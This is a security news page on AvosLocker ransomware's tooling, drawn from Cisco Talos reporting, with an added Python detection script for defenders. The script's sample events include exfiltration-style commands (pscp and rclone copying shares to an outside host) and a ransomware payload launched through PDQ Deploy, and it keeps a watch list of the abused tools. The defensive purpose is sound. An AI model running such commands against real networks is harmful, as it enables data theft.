Avos ransomware threat actor updates its attack arsenal
Security News, June 2022
A new report from Cisco Talos Intelligence Group exposes new tools used in Avos ransomware attacks.
The AvosLocker operators run a ransomware-as-a-service: affiliates get a control panel, a negotiation panel with push and sound notifications, decryption tests, and access to a network of penetration testers, initial access brokers and other contacts.
According to the FBI, AvosLocker has already hit critical infrastructure sectors in the US, including financial services, manufacturing and government facilities. The Avos operators do not allow affiliates to attack post-Soviet countries.
Once reconnaissance and lateral movement are complete, the attackers use PDQ Deploy, a legitimate software deployment tool, to push the ransomware and supporting tools across the target network.
Earlier Avos attacks have also used other off-the-shelf tools: the PuTTY Secure Copy client (pscp) and Rclone for moving files, the network scanner Advanced IP Scanner, and WinLister.
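The detection angle for the tooling above is that every one of these programs is legitimate, so the signal is where it runs from, who launched it, and whether the deployment tool is the parent. The script below is an added example for this page, not code from Cisco Talos or TechRepublic: it triages constructed Sysmon-style process-creation events for the named tools and for payloads launched by the PDQ Deploy runner out of user-writable directories. The event field names, the executable names in KNOWN_TOOLS, the runner file-name marker and the sample events are all assumptions made for the example.

```python
"""Triage Windows process-creation events for the tooling described above.

Added example for this page; it is not code from Cisco Talos or TechRepublic.
Assumptions: a Sysmon-style event shape (Image, ParentImage, CommandLine, User),
the executable names listed in KNOWN_TOOLS, and that PDQ Deploy launches its
payloads from a runner whose file name contains "PDQDeployRunner".
"""
import ntpath

# Tools named in the Talos reporting; the file names are an assumption.
KNOWN_TOOLS = {
    "pscp.exe": "PuTTY Secure Copy client (file transfer)",
    "rclone.exe": "Rclone (cloud storage sync)",
    "advanced_ip_scanner.exe": "Advanced IP Scanner (network recon)",
    "winlister.exe": "WinLister (window enumeration)",
}

# Substring identifying the PDQ Deploy runner process (assumption, see docstring).
PDQ_RUNNER_MARKER = "pdqdeployrunner"

# Directories a low-privileged user or a dropped payload can normally write to.
# Software that PDQ Deploy legitimately installs would not usually run from here.
WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
    "c:\\perflogs\\",
)

# Constructed sample events; this is not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Users\jdoe\Downloads\advanced_ip_scanner.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "advanced_ip_scanner.exe", "User": r"CORP\jdoe"},
    {"Image": r"C:\Users\Public\pscp.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pscp.exe -r C:\Shares\Finance ops@203.0.113.10:/data",
     "User": r"CORP\svc_backup"},
    {"Image": r"C:\ProgramData\rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe copy D:\Exports remote:dump --transfers 8",
     "User": r"CORP\svc_backup"},
    # A normal deployment: PDQ runner installs an MSI via the system msiexec.
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\AdminArsenal\PDQDeployRunner\PDQDeployRunner-1.exe",
     "CommandLine": "msiexec.exe /i package.msi /qn", "User": r"NT AUTHORITY\SYSTEM"},
    # The pattern from the report: PDQ runner executing a payload from a temp dir.
    {"Image": r"C:\Windows\Temp\ws\locker.exe",
     "ParentImage": r"C:\Windows\AdminArsenal\PDQDeployRunner\PDQDeployRunner-1.exe",
     "CommandLine": "locker.exe --threads 8", "User": r"NT AUTHORITY\SYSTEM"},
]


def is_writable_location(path):
    """True if the image path sits under a commonly user-writable directory."""
    return path.lower().startswith(WRITABLE_PREFIXES)


def triage(events):
    """Return (event_index, reason) pairs for events worth an analyst's attention."""
    findings = []
    for i, ev in enumerate(events):
        # ntpath handles backslash paths regardless of the host OS.
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev["ParentImage"]).lower()
        if image in KNOWN_TOOLS:
            findings.append(
                (i, f"{KNOWN_TOOLS[image]} run by {ev['User']}: {ev['CommandLine']}"))
        if PDQ_RUNNER_MARKER in parent and is_writable_location(ev["Image"]):
            findings.append(
                (i, f"PDQ Deploy runner launched {ev['Image']} from a user-writable directory"))
    return findings


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

On the sample data the benign svchost and the PDQ-driven msiexec install produce nothing, while the scanner, both file-transfer tools and the temp-directory payload launched by the runner are each reported. In a real environment the PDQ rule needs an allow-list for the packages the deployment team actually pushes, otherwise it fires on every ad-hoc script deployment.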
Figure B (screenshot of the Avos leak site). Avos victims who do not pay have their data sold, as stated on the Avos website: "All data is FOR SALE. Contact us with your offers. We only sell data to third parties if the owner of said data refuses to pay."
News URL
https://www.techrepublic.com/article/avos-ransomware-updates-attack/
Related news
- BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks
- Black Basta, Bl00dy ransomware gangs join ScreenConnect attacks
- FBI, CISA warn US hospitals of targeted BlackCat ransomware attacks
- FBI Warns U.S. Healthcare Sector of Targeted BlackCat Ransomware Attacks
- LockBit ransomware returns to attacks with new encryptors, servers
- Fidelity customers' financial info feared stolen in suspected ransomware attack
- Alert: GhostSec and Stormous Launch Joint Ransomware Attacks in Over 15 Countries
- Duvel says it has "more than enough" beer after ransomware attack
- FBI: Critical infrastructure suffers spike in ransomware attacks